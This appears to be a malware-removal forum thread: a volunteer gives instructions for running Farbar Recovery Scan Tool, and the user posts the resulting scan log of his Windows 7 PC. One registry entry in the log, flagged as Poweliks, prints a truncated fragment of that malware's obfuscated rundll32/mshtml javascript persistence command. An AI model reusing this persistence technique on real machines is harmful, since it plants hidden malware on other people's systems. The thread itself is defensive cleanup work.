  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please read through my instructions carefully and completely before executing them. I will lay the instructions out in a step by step order to make them easy to follow.
  • Please make sure that all the programs I ask you to download are downloaded to and run from your Desktop.
  • Please make sure you (if you are able) to print out these instructions so that you will be able to refer to them while working on your machine. Part of the solution(s) to your problem may involve us working in Safe Mode and you will need them to go by.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • Please make sure you reply within 3 days to my responses, if there is no reply within 3 days, the topic will be closed and you will need to request the topic be reopened.
  • Before we get started, please remember we will do our best to get your machine repaired. However, there are some cases where the only solution is a reformat and reinstall of the operating system. This is a worst case scenario though.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
  • If possible, please have your original Windows installation disks handy, just in case.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexepected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Now, let's get started, shall we? :thumbsup:


Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt

    farbarmainpanel_zps77bf9e25.jpg
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

  • 0

#3
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Thank you for volunteering your time to help me.  It is much appreciated.

Joe

 

Posted below is the FRST log.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by Joe (administrator) on JOE-PC on 06-11-2014 08:10:46
Running from C:\Users\Joe\Desktop
Loaded Profile: Joe (Available profiles: Joe)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Windows\System32\PnkBstrA.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
() C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorIcon.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Corsair Components  Inc) C:\Program Files (x86)\Corsair\K90 Keyboard\K90Hid.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
() C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(Advanced Micro Devices Inc.) D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Corsair Components  Inc) C:\Program Files (x86)\Corsair\K90 Keyboard\CorsTra.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr.exe
(ATI Technologies Inc.) D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr_im.exe
(Raptr Inc.) C:\Program Files (x86)\Raptr\raptr_ep64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\McUICnt.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6854800 2012-12-02] (Realtek Semiconductor)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [7477016 2013-04-24] (Logitech Inc.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorIcon.exe [286720 2012-08-07] (Intel Corporation)
HKLM-x32\...\Run: [RUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe [115048 2011-09-20] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [5624784 2013-07-25] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [Corsair laver] => C:\Program Files (x86)\Corsair\K90 Keyboard\K90Hid.exe [1780736 2013-06-05] (Corsair Components  Inc)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [926896 2012-09-23] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BrMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1163264 2012-09-25] ()
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [StartCCC] => D:\Program Files\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-09-15] (Advanced Micro Devices, Inc.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\Steam.exe [1938624 2014-10-21] (Valve Corporation)
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3600216 2014-09-19] (Electronic Arts)
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\Joe\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 92b95ff63cb347d3b5a4057438330a1c-a1039ab05693988e6915dc70dba9c5f34cd570fc --CMPID 0913a
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [AVG-Secure-Search-Update_0214c] => C:\Users\Joe\AppData\Roaming\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe /PROMPT /mid=92b95ff63cb347d3b5a4057438330a1c-a1039ab05693988e6915dc70dba9c5f34cd570fc /CMPID=0214c
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55568 2014-10-17] (Raptr, Inc)
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...\MountPoints2: {13dc140f-08e2-11e3-a64f-806e6f6e6963} - E:\Autorun.exe
HKU\S-1-5-21-3603006954-300617725-3809153182-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WG111v3 Smart Wizard.lnk
ShortcutTarget: NETGEAR WG111v3 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL =
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll (Microsoft Corp.)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\3.0.40624.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-15]
CHR Extension: (YouTube) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-08-21]
CHR Extension: (Google Search) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-08-21]
CHR Extension: (Google Wallet) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-25]
CHR Extension: (Gmail) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-08-21]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe [130976 2011-03-01] (Futuremark Corporation)
S2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorDataMgrSvc.exe [7168 2012-08-07] (Intel Corporation) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-08-09] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2014-08-16] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-08-13] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1817560 2013-05-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [1033688 2013-05-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2013-05-15] (Safer-Networking Ltd.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [833728 2014-10-21] (Valve Corporation) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R3 CORSGKB; C:\Windows\System32\drivers\CORSGKB.sys [25600 2012-03-27] ( )
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [26072 2012-08-07] (Intel Corporation)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [66800 2013-01-17] (Logitech Inc.)
R3 rusb3hub; C:\Windows\System32\DRIVERS\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation)
R3 rusb3xhc; C:\Windows\System32\DRIVERS\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation)
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-06 08:10 - 2014-11-06 08:10 - 00015762 _____ () C:\Users\Joe\Desktop\FRST.txt
2014-11-06 08:10 - 2014-11-06 08:10 - 00000000 ____D () C:\FRST
2014-11-06 08:09 - 2014-11-06 08:05 - 02114560 _____ (Farbar) C:\Users\Joe\Desktop\FRST64.exe
2014-11-02 16:19 - 2014-11-02 16:19 - 00068680 _____ () C:\Users\Joe\Desktop\Extras.Txt
2014-11-02 16:14 - 2014-11-02 16:14 - 00087596 _____ () C:\Users\Joe\Desktop\OTL.Txt
2014-11-02 16:00 - 2014-11-02 16:19 - 00068680 _____ () C:\Users\Joe\Downloads\Extras.Txt
2014-11-02 15:59 - 2014-11-02 15:59 - 00087596 _____ () C:\Users\Joe\Downloads\OTL.Txt
2014-11-02 15:50 - 2014-11-02 15:50 - 00602112 _____ (OldTimer Tools) C:\Users\Joe\Downloads\OTL.exe
2014-11-02 14:27 - 2014-11-02 14:36 - 217002689 _____ (AGOT TEAM ) C:\Users\Joe\Downloads\CK2-AGOT_setup_0.8.exe
2014-11-02 14:20 - 2014-11-02 14:21 - 00000000 ____D () C:\Users\Joe\Downloads\CK2GOT08
2014-11-02 09:53 - 2014-11-02 09:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wot Numbers
2014-11-01 22:33 - 2014-11-01 22:33 - 00000000 ____D () C:\Users\Joe\Documents\Paradox Interactive
2014-11-01 22:00 - 2014-11-01 22:00 - 00000222 _____ () C:\Users\Joe\Desktop\Crusader Kings II.url
2014-11-01 10:01 - 2014-11-02 19:42 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\Wot Numbers
2014-11-01 10:00 - 2014-11-01 10:00 - 00000000 ____D () C:\Users\Joe\Downloads\WotNumbersSetup
2014-10-21 20:16 - 2014-10-21 20:16 - 00000965 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2014-10-21 20:16 - 2014-10-21 20:16 - 00000000 ____D () C:\Users\Joe\AppData\Roaming\AVG2015
2014-10-21 20:15 - 2014-10-21 20:16 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 20:03 - 2014-11-02 15:07 - 00000000 ____D () C:\Users\Joe\AppData\Local\Avg2015
2014-10-20 08:53 - 2014-10-29 09:56 - 00011264 _____ () C:\Users\Joe\Desktop\Weight 2014.xls
2014-10-19 12:55 - 2014-10-06 19:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-19 12:55 - 2014-10-06 19:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-19 12:55 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-19 12:55 - 2014-09-25 15:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-19 12:55 - 2014-09-25 15:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-19 12:55 - 2014-09-25 15:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-19 12:55 - 2014-09-25 15:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-19 12:55 - 2014-09-25 15:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-19 12:55 - 2014-09-25 15:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-19 12:55 - 2014-09-25 15:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-19 12:55 - 2014-09-18 18:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-19 12:55 - 2014-09-18 18:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-19 12:55 - 2014-09-18 18:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-19 12:55 - 2014-09-18 18:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-19 12:55 - 2014-09-18 18:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-19 12:55 - 2014-09-18 18:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-19 12:55 - 2014-09-18 18:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-19 12:55 - 2014-09-18 18:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-19 12:55 - 2014-09-18 18:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-19 12:55 - 2014-09-18 18:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-19 12:55 - 2014-09-18 18:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-19 12:55 - 2014-09-18 18:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-19 12:55 - 2014-09-18 18:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-19 12:55 - 2014-09-18 18:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-19 12:55 - 2014-09-18 18:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-19 12:55 - 2014-09-18 18:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-19 12:55 - 2014-09-18 18:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-19 12:55 - 2014-09-18 18:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-19 12:55 - 2014-09-18 17:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-19 12:55 - 2014-09-18 17:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-19 12:55 - 2014-09-18 17:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-19 12:55 - 2014-09-18 17:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-19 12:55 - 2014-09-18 17:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-19 12:55 - 2014-09-18 17:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-19 12:55 - 2014-09-18 17:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-19 12:55 - 2014-09-18 17:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-19 12:55 - 2014-09-18 17:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-19 12:55 - 2014-09-18 17:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-19 12:55 - 2014-09-18 17:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-19 12:55 - 2014-09-18 17:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-19 12:55 - 2014-09-18 17:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-19 12:55 - 2014-09-18 17:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-19 12:55 - 2014-09-18 17:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-19 12:55 - 2014-09-18 17:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-19 12:55 - 2014-09-18 16:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-19 12:55 - 2014-09-18 16:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-19 12:55 - 2014-09-18 16:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-19 12:55 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-19 12:54 - 2014-09-18 19:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
